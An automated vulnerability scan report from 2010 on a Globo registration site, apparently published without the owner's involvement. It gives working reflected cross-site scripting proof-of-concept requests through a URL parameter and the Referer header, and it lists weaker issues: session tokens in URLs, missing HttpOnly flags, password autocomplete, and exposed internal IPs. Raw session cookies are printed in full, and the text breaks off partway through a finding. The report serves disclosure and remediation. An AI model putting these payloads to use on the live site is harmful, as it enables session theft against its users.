cadastrofree.globo.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Cross Site Scripting Report | CloudScan Vulnerability Crawler

Report generated by XSS.CX at Fri Dec 31 09:57:54 CST 2010.



Contents

Loading

1. Cross-site scripting (reflected)

1.1. https://cadastrofree.globo.com/contrato/1745 [url parameter]

1.2. https://cadastrofree.globo.com/login/1745 [Referer HTTP header]

2. Session token in URL

2.1. https://cadastrofree.globo.com/Servlet/do/cadastro_submit

2.2. https://cadastrofree.globo.com/Servlet/word.jpg

2.3. https://cadastrofree.globo.com/cadastro/1745

3. Cookie without HttpOnly flag set

4. Password field with autocomplete enabled

4.1. https://cadastrofree.globo.com/Servlet/do/cadastro_submit

4.2. https://cadastrofree.globo.com/cadastro/1745

4.3. https://cadastrofree.globo.com/cadastro/1745

4.4. https://cadastrofree.globo.com/cadastro/1745

4.5. https://cadastrofree.globo.com/login/1745

5. Private IP addresses disclosed

5.1. https://cadastrofree.globo.com/Servlet/do/cadastro_submit

5.2. https://cadastrofree.globo.com/Servlet/word.jpg

5.3. https://cadastrofree.globo.com/Servlet/word.jpg

5.4. https://cadastrofree.globo.com/cadastro/1745

5.5. https://cadastrofree.globo.com/cadastro/1745

5.6. https://cadastrofree.globo.com/contrato/1745

5.7. https://cadastrofree.globo.com/favicon.ico

5.8. https://cadastrofree.globo.com/favicon.ico

5.9. https://cadastrofree.globo.com/login/1745

6. Cacheable HTTPS response

7. SSL certificate



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://cadastrofree.globo.com/contrato/1745 [url parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /contrato/1745

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df078"><script>alert(1)</script>521298cb2ae was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contrato/1745?url=javascript:history.go(-1)df078"><script>alert(1)</script>521298cb2ae HTTP/1.1
Host: cadastrofree.globo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=04FE2772C9708E2FFB7223167596160D; RMAM=01TFSM_12.4fE9CbFG|; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; OAX=rnneEk0d7PgABd6P; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829;

Response

HTTP/1.0 200 OK
Date: Fri, 31 Dec 2010 15:11:35 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server-IP: 10.10.180.6
Pragma: no-cache
Cache-control: max-age=0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<input type="button" value="continuar" class="botao-continuar cliqueUnico" onclick="window.location.href = 'javascript:history.go(-1)df078"><script>alert(1)</script>521298cb2ae'" />
...[SNIP]...

1.2. https://cadastrofree.globo.com/login/1745 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /login/1745

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a965"><script>alert(1)</script>143b443ef90 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /login/1745 HTTP/1.1
Host: cadastrofree.globo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=04FE2772C9708E2FFB7223167596160D; RMAM=01TFSM_12.4fE9CbFG|; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; OAX=rnneEk0d7PgABd6P; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829;
Referer: http://www.google.com/search?hl=en&q=6a965"><script>alert(1)</script>143b443ef90

Response

HTTP/1.0 200 OK
Date: Fri, 31 Dec 2010 15:06:10 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server-IP: 10.10.180.6
Pragma: no-cache
Cache-control: max-age=0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...
<input type="hidden" value="http://www.google.com/search?hl=en&q=6a965"><script>alert(1)</script>143b443ef90" name="urlRetorno"/>
...[SNIP]...

2. Session token in URL  previous  next
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


2.1. https://cadastrofree.globo.com/Servlet/do/cadastro_submit  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cadastrofree.globo.com
Path:   /Servlet/do/cadastro_submit

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /Servlet/do/cadastro_submit;jsessionid=04FE2772C9708E2FFB7223167596160D HTTP/1.1
Host: cadastrofree.globo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=04FE2772C9708E2FFB7223167596160D; RMAM=01TFSM_12.4fE9CbFG|; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; OAX=rnneEk0d7PgABd6P; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829;

Response

HTTP/1.0 200 OK
Date: Fri, 31 Dec 2010 15:11:13 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-control: max-age=0
Server-IP: 10.10.180.6
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

2.2. https://cadastrofree.globo.com/Servlet/word.jpg  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cadastrofree.globo.com
Path:   /Servlet/word.jpg

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /Servlet/word.jpg;jsessionid=04FE2772C9708E2FFB7223167596160D HTTP/1.1
Host: cadastrofree.globo.com
Connection: keep-alive
Referer: https://cadastrofree.globo.com/cadastro/1745
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEk0d7PgABd6P; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829; RMAM=01TFSM_12.4fE9CbFG|; JSESSIONID=04FE2772C9708E2FFB7223167596160D

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 14:49:30 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-control: max-age=0
Server-IP: 10.10.180.7
Content-Type: image/jpeg
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 2022

......JFIF.............C......
........'.....0"$.'92<;8276?GZL?CUD67NkOU]`efe=KownbvZcea...C...........aA7Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa......-...."..............................
...[SNIP]...

2.3. https://cadastrofree.globo.com/cadastro/1745  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cadastrofree.globo.com
Path:   /cadastro/1745

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /cadastro/1745 HTTP/1.1
Host: cadastrofree.globo.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEk0d7PgABd6P; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829; RMAM=01TFSM_12.4fE9CbFG|

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 14:49:26 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-control: max-age=0
Server-IP: 10.10.180.7
Set-Cookie: JSESSIONID=04FE2772C9708E2FFB7223167596160D; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 11534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div class="componente-imagem-seguranca ">
   <img src="/Servlet/word.jpg;jsessionid=04FE2772C9708E2FFB7223167596160D" width="197" height="45" alt="" class="imagem-seguranca" />

   <label for="txtSeguranca" class="descricao-componente">
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://cadastrofree.globo.com
Path:   /cadastro/1745

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /cadastro/1745 HTTP/1.1
Host: cadastrofree.globo.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEk0d7PgABd6P; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829; RMAM=01TFSM_12.4fE9CbFG|

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 14:49:26 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-control: max-age=0
Server-IP: 10.10.180.7
Set-Cookie: JSESSIONID=04FE2772C9708E2FFB7223167596160D; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 11534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

4. Password field with autocomplete enabled  previous  next
There are 5 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


4.1. https://cadastrofree.globo.com/Servlet/do/cadastro_submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /Servlet/do/cadastro_submit

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /Servlet/do/cadastro_submit HTTP/1.1
Host: cadastrofree.globo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=04FE2772C9708E2FFB7223167596160D; RMAM=01TFSM_12.4fE9CbFG|; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; OAX=rnneEk0d7PgABd6P; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829;

Response

HTTP/1.0 200 OK
Date: Fri, 31 Dec 2010 14:58:56 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-control: max-age=0
Server-IP: 10.10.180.6
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div class="cadastro-form componentes">
       
<form method="post" action="/Servlet/do/cadastro_submit">
<h2 class="titulo-modulo">
...[SNIP]...
</label>
<input maxlength="15" type="password" name="txtSenha" id="txtSenha" class="txt" />
</div>
...[SNIP]...
</label>
<input maxlength="15" type="password" name="txtNovaSenha" id="txtNovaSenha" class="txt" />
</div>
...[SNIP]...

4.2. https://cadastrofree.globo.com/cadastro/1745  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /cadastro/1745

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /cadastro/1745 HTTP/1.1
Host: cadastrofree.globo.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEk0d7PgABd6P; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829; RMAM=01TFSM_12.4fE9CbFG|

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 14:49:26 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-control: max-age=0
Server-IP: 10.10.180.7
Set-Cookie: JSESSIONID=04FE2772C9708E2FFB7223167596160D; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 11534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div class="cadastro-form componentes">
       
<form method="post" action="/Servlet/do/cadastro_submit;jsessionid=04FE2772C9708E2FFB7223167596160D">
<h2 class="titulo-modulo">
...[SNIP]...
</label>
<input maxlength="15" type="password" name="txtSenha" id="txtSenha" class="txt" />
</div>
...[SNIP]...
</label>
<input maxlength="15" type="password" name="txtNovaSenha" id="txtNovaSenha" class="txt" />
</div>
...[SNIP]...

4.3. https://cadastrofree.globo.com/cadastro/1745  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /cadastro/1745

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /cadastro/1745 HTTP/1.1
Host: cadastrofree.globo.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEk0d7PgABd6P; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829; RMAM=01TFSM_12.4fE9CbFG|

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 14:57:40 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-control: max-age=0
Server-IP: 10.10.180.6
Set-Cookie: JSESSIONID=D15B72FDAC21E7244F267A1B22EFFBDF; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 11532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div class="cadastro-form componentes">
       
<form method="post" action="/Servlet/do/cadastro_submit;jsessionid=D15B72FDAC21E7244F267A1B22EFFBDF">
<h2 class="titulo-modulo">
...[SNIP]...
</label>
<input maxlength="15" type="password" name="txtSenha" id="txtSenha" class="txt" />
</div>
...[SNIP]...
</label>
<input maxlength="15" type="password" name="txtNovaSenha" id="txtNovaSenha" class="txt" />
</div>
...[SNIP]...

4.4. https://cadastrofree.globo.com/cadastro/1745  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /cadastro/1745

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /cadastro/1745 HTTP/1.1
Host: cadastrofree.globo.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEk0d7PgABd6P; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829; RMAM=01TFSM_12.4fE9CbFG|; JSESSIONID=04FE2772C9708E2FFB7223167596160D

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 14:56:55 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-control: max-age=0
Server-IP: 10.10.180.6
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 11445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div class="cadastro-form componentes">
       
<form method="post" action="/Servlet/do/cadastro_submit">
<h2 class="titulo-modulo">
...[SNIP]...
</label>
<input maxlength="15" type="password" name="txtSenha" id="txtSenha" class="txt" />
</div>
...[SNIP]...
</label>
<input maxlength="15" type="password" name="txtNovaSenha" id="txtNovaSenha" class="txt" />
</div>
...[SNIP]...

4.5. https://cadastrofree.globo.com/login/1745  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /login/1745

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login/1745 HTTP/1.1
Host: cadastrofree.globo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=04FE2772C9708E2FFB7223167596160D; RMAM=01TFSM_12.4fE9CbFG|; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; OAX=rnneEk0d7PgABd6P; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829;

Response

HTTP/1.0 200 OK
Date: Fri, 31 Dec 2010 15:05:19 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server-IP: 10.10.180.6
Pragma: no-cache
Cache-control: max-age=0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...
</strong>        <form action="" method="post" target="_top">                                            <fieldset>
...[SNIP]...
</label>         <input type="password" name="senha-passaporte" id="senha-passaporte" class="txt" />         </p>
...[SNIP]...

5. Private IP addresses disclosed  previous  next
There are 9 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


5.1. https://cadastrofree.globo.com/Servlet/do/cadastro_submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /Servlet/do/cadastro_submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Servlet/do/cadastro_submit HTTP/1.1
Host: cadastrofree.globo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=04FE2772C9708E2FFB7223167596160D; RMAM=01TFSM_12.4fE9CbFG|; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; OAX=rnneEk0d7PgABd6P; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829;

Response

HTTP/1.0 200 OK
Date: Fri, 31 Dec 2010 14:58:56 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-control: max-age=0
Server-IP: 10.10.180.6
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

5.2. https://cadastrofree.globo.com/Servlet/word.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /Servlet/word.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Servlet/word.jpg HTTP/1.1
Host: cadastrofree.globo.com
Connection: keep-alive
Referer: https://cadastrofree.globo.com/cadastro/1745
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEk0d7PgABd6P; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829; RMAM=01TFSM_12.4fE9CbFG|; JSESSIONID=04FE2772C9708E2FFB7223167596160D

Response

HTTP/1.1 200 OK
